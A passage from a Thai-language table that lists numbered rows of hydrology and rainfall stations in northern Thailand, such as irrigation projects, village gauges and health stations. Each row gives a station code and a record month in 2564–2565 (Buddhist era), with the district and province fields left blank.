694 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด เมษายน 2565
695 28331 โครงการชลประทานน่าน อำเภอ จังหวัด เมษายน 2565
696 730171 บ้านมาง อำเภอ จังหวัด เมษายน 2565
697 40111 บ้านห้วยสัก อำเภอ จังหวัด เมษายน 2565
698 40151 บ้านน้ำโค้ง อำเภอ จังหวัด เมษายน 2565
699 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด เมษายน 2565
700 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด เมษายน 2565
701 07790 อบต.เทพเสด็จ อำเภอ จังหวัด เมษายน 2565
702 07780 อนามัยนาเม็ง อำเภอ จังหวัด เมษายน 2565
703 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด เมษายน 2565
704 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด เมษายน 2565
705 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด เมษายน 2565
706 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด เมษายน 2565
707 07801 น้ำแม่วาง อำเภอ จังหวัด เมษายน 2565
708 17181 บ้านแม่อีไฮ อำเภอ จังหวัด เมษายน 2565
709 07751 บ้านม่วงป๊อก อำเภอ จังหวัด เมษายน 2565
710 070731 น้ำแม่ตื่น อำเภอ จังหวัด เมษายน 2565
711 07391 สชป.1 อำเภอ จังหวัด เมษายน 2565
712 16330 บ้า่นไฮ อำเภอ จังหวัด พฤษภาคม 2565
713 16151 W.15A อำเภอ จังหวัด พฤษภาคม 2565
714 16151 W.15A อำเภอ จังหวัด เมษายน 2565
715 16330 บ้า่นไฮ อำเภอ จังหวัด เมษายน 2565
716 20111 น้ำปาย อำเภอ จังหวัด มีนาคม 2564
717 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด มีนาคม 2564
718 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด มีนาคม 2564
719 28331 โครงการชลประทานน่าน อำเภอ จังหวัด มีนาคม 2564
720 730171 บ้านมาง อำเภอ จังหวัด มีนาคม 2564
721 40111 บ้านห้วยสัก อำเภอ จังหวัด มีนาคม 2564
722 40151 บ้านน้ำโค้ง อำเภอ จังหวัด มีนาคม 2564
723 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด มีนาคม 2564
724 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด มีนาคม 2564
725 07790 อบต.เทพเสด็จ อำเภอ จังหวัด มีนาคม 2564
726 07780 อนามัยนาเม็ง อำเภอ จังหวัด มีนาคม 2564
727 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด มีนาคม 2564
728 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด มีนาคม 2564
729 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด มีนาคม 2564
730 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด มีนาคม 2564
731 07801 น้ำแม่วาง อำเภอ จังหวัด มีนาคม 2564
732 17181 บ้านแม่อีไฮ อำเภอ จังหวัด มีนาคม 2564
733 07751 บ้านม่วงป๊อก อำเภอ จังหวัด มีนาคม 2564
734 070731 น้ำแม่ตื่น อำเภอ จังหวัด มีนาคม 2564
735 07391 สชป.1 อำเภอ จังหวัด มีนาคม 2564
736 20111 น้ำปาย อำเภอ จังหวัด กุมภาพันธ์ 2564
737 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด กุมภาพันธ์ 2564
738 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด กุมภาพันธ์ 2564
739 28331 โครงการชลประทานน่าน อำเภอ จังหวัด กุมภาพันธ์ 2564
740 730171 บ้านมาง อำเภอ จังหวัด กุมภาพันธ์ 2564
741 40111 บ้านห้วยสัก อำเภอ จังหวัด กุมภาพันธ์ 2564
742 40151 บ้านน้ำโค้ง อำเภอ จังหวัด กุมภาพันธ์ 2564
743 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด กุมภาพันธ์ 2564
744 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด กุมภาพันธ์ 2564
745 07790 อบต.เทพเสด็จ อำเภอ จังหวัด กุมภาพันธ์ 2564
746 07780 อนามัยนาเม็ง อำเภอ จังหวัด กุมภาพันธ์ 2564
747 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด กุมภาพันธ์ 2564
748 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด กุมภาพันธ์ 2564
749 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด กุมภาพันธ์ 2564
750 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด กุมภาพันธ์ 2564
751 07801 น้ำแม่วาง อำเภอ จังหวัด กุมภาพันธ์ 2564
752 17181 บ้านแม่อีไฮ อำเภอ จังหวัด กุมภาพันธ์ 2564
753 07751 บ้านม่วงป๊อก อำเภอ จังหวัด กุมภาพันธ์ 2564
754 070731 น้ำแม่ตื่น อำเภอ จังหวัด กุมภาพันธ์ 2564
755 07391 สชป.1 อำเภอ จังหวัด กุมภาพันธ์ 2564
756 16330 บ้า่นไฮ อำเภอ จังหวัด มีนาคม 2564
757 16151 W.15A อำเภอ จังหวัด มีนาคม 2564
758 20111 น้ำปาย อำเภอ จังหวัด มกราคม 2564
759 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด มกราคม 2564
760 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด มกราคม 2564
761 28331 โครงการชลประทานน่าน อำเภอ จังหวัด มกราคม 2564
762 730171 บ้านมาง อำเภอ จังหวัด มกราคม 2564
763 40111 บ้านห้วยสัก อำเภอ จังหวัด มกราคม 2564
764 40151 บ้านน้ำโค้ง อำเภอ จังหวัด มกราคม 2564
765 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด มกราคม 2564
766 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด มกราคม 2564